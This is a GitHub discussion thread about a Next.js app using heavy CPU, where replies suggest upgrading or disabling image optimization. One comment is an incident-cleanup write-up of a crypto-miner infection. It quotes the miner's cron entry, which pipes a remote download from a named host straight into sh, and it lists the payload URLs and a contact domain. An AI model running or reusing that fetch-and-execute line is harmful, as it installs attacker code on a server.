### DISCUSSION TITLE
Next js consuming high CPU

### DISCUSSION THREAD

**Discussion by kuldip-dev** [vercel/next.js#49203] [Help] [answered]
### Summary

My next js application is using high CPU even I didn't use ISR or any other package.
The website is based on news and the users are normally 15k to 20k but it was consuming 10 cores earlier but now it is consuming around 40 cores CPU.

I have checked the CPU usage using `top` command and here is the result for 1 pod.
![image](https://user-images.githubusercontent.com/104207212/236203181-0f7734f6-dde0-44b1-b7a7-d19d24d602c6.png)
**/app/node_modules/.bin/next** this process is taking 265% of VSZ.

Any suggestions to troubleshoot this issue?

@icyJoseph, @leerob other too
Thanks in advance.

**Comment by ytianzaishui** [comment]
Not only on server by also on client user computer.
You should try the office example or other website dev by next.

1. open activities monitor on you computer。focus on cup

2. open the link： https://app-dir.vercel.app/streaming or other website dev by next may happen.
<img width="1075" alt="image" src="https://user-images.githubusercontent.com/18025841/236986143-b7dfd39f-d4e8-4ae3-943b-3cab3db59b81.png">

3. Keep the web active，look back monitor，cup up！but if the windows of this next web play background。cup normal.

**Reply by yudiz-kuldip** [reply]
Does anyone have any ideas on how to troubleshoot this problem?

**Comment by jw-miaem** [comment]
started to notice high cpu recently when trying to get bundle size reduced, not sure what is causing it on nextjs 12.3.4 with a few dependencies (react query, theme ui and more) so could be something else

**Reply by jw-miaem** [reply]
also not using ISR

**Reply by jw-miaem** [reply]
interesting checked pod 
<img width="605" alt="Screenshot 2023-05-10 at 1 36 37 pm" src="https://github.com/vercel/next.js/assets/778991/20e35a94-37be-4f3d-9d05-4ac93028b49d">

**Comment by redimongo** [comment]
Any solutions?

**Comment by asasvirtuais** [comment]
Using codespaces here. It is pretty much making it impossible to code.

**Comment by siam88** [comment]
Any solutions?

**Comment by kuldip-dev** [comment, marked as answer]
i've updated next js version 12.2.0 to 13.4.3.
And now it's not consuming high CPU don't know why?

**Reply by siam88** [reply]
i am using   "next": "^14.2.12" . still this one is happening on the server

**Reply by UjjavalParmar** [reply]
Have you found any solution for this?

**Reply by Rishipatel25** [reply]
@siam88 Have you find any solution?

**Reply by siam88** [reply]
Not yet but image optimization could be one of the factor

**Reply by CaduGomes** [reply]
In September, i completely removed image optimization by configuring next.config.js and changing next <Image /> tag to standard html <img> tag. The problem was solved in my case, CPU spikes stopped

**Reply by muharremkackin** [reply]
@CaduGomes you are right, I disabled image optimization and it solved

**Comment by aiddroid** [comment]
Last night, it almost burned my MacBook — how embarrassing!

**Comment by bloodykheeng** [comment]
---
## ✅ i had the same problem to on my linode vps where i find cpu usage very high in the midnight but i discovered there was milicious executable running 
and using high cpu usage i saw it through htop and it reulted to be a crypto miner

## ✅ How I Removed a Malicious Crypto Miner on My Linux Server

I recently discovered that my Linux system was compromised by a malicious cryptocurrency mining script. Here's how I diagnosed and resolved the issue:

---

### 🔎 Step 1: Spotted High CPU Usage with `htop`

I noticed my server was unusually slow, so I opened `htop` to check system resource usage:

```bash
htop
```

There I saw suspicious processes using a lot of CPU. I noted the PID (in my case `242116`) and terminated it:

```bash
kill -9 242116
```

---

### 🧪 Step 2: Investigated Cron Jobs

To check for persistent malware, I listed all cron jobs:

```bash
ls -la /etc/cron*
```

I found two suspicious files:

```
-rw-r--r-- 1 root root 120 May 15 00:00 mdadm
-rw-r--r-- 1 root root  59 May 15 00:00 reboot
```

---

### 📂 Step 3: Inspected the Contents

I checked both files to see what they were doing:

```bash
cat /etc/cron.d/reboot
```

```cron
@reboot root sleep 60 && cd /root/.local/share && ./vyatta
```

```bash
cat /etc/cron.d/mdadm
```

```cron
0 0 * * * root sh -c "(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"
```

It was clear `mdadm` was downloading and executing a script from a remote server every night.

---

### 🔍 Step 4: Analyzed the Malicious Script

I wanted to see what was being downloaded, so I created a safe test directory:

```bash
mkdir /root/test && cd /root/test
curl -sk https://fulminare.top -o malicious_script.txt
nano malicious_script.txt
```

Upon inspection, the script was indeed malicious.

---

### ☠️ What the Script Was Doing

* **Generated random filenames** to disguise itself.
* **Killed CPU-intensive processes** (to make way for crypto mining).
* **Downloaded payloads** based on system architecture from `http://77.110.110.55`:

  * `x86_64`: `/1`
  * `aarch64`: `/2`
  * `amd64`: `/3` (saved as `support`)
* **Established persistence** via:

  * Cron jobs (`/etc/cron.d`)
  * Udev rules (`/etc/udev/rules.d`)
* **Attempted privilege escalation**
* **Cleared logs and bash history** to hide traces
* **Communicated with external IPs**, including `loop.anondns.net`

---

### 🧹 Step 5: Removed the Malware

I deleted the malicious cron jobs:

```bash
rm -f /etc/cron.d/reboot
rm -f /etc/cron.d/mdadm
```

I also checked and removed malicious udev rules:

```bash
rm -f /etc/udev/rules.d/mdadm
```

## NB
im not sure if reboot was really a culprit too cos when i checked on net i saw vyata is a linux networking tool so if its not a culprit dont delete it 

Then I manually killed any remaining suspicious processes and checked the `/root/.local/share` folder for the `vyatta` binary:

```bash
rm -f /root/.local/share/vyatta
```



---

**Reply by thomasjmwb** [reply]
this looks like ai generated slop

**Reply by bloodykheeng** [reply]
@thomasjmwb yah i used ai to organise for me my notes into a step by step markdown but indeed for me i discovered that someone had created a job that downloads stuff on my server and use alot of cpu over 200% i was having a linode vps

**Reply by icyJoseph** [reply]
Not long ago, someone reported something slightly similar as their solution, https://github.com/vercel/next.js/discussions/81967#discussioncomment-14372874
